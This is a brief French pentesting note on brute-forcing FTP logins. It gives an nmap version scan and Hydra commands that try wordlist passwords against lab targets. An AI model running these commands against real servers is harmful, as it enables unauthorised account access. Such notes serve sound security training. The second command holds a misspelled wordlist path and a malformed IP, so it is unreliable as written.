FTP - Brute Force Attack

Nous lançons la commande suivante avec Nmap pour vérifier la version FTP et s'il présente des vulnérabilités :

nmap -sCV -p21 127.0.0.1

La version installée est la 7.93 et aucune vulnérabilité n'est détectée.

Nous exécutons une technique de force brute en utilisant l'outil Hydra (si "l" ou "p" sont en minuscules, cela signifie que l'utilisateur ou le mot de passe est inconnu ; s'ils sont en majuscules, ils sont connus).

hydra -l jordan -P /usr/share/wordlists/rockyou.txt ftp://127.0.0.1 -t 15

Pwned :)

Attaque par force brute FTP

hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-frameword/data/wordlists/unix_passwords.txt 10.10.10.10. -t 4 ftp

Mis à jour il y a 8 mois

Ce contenu vous a-t-il été utile ?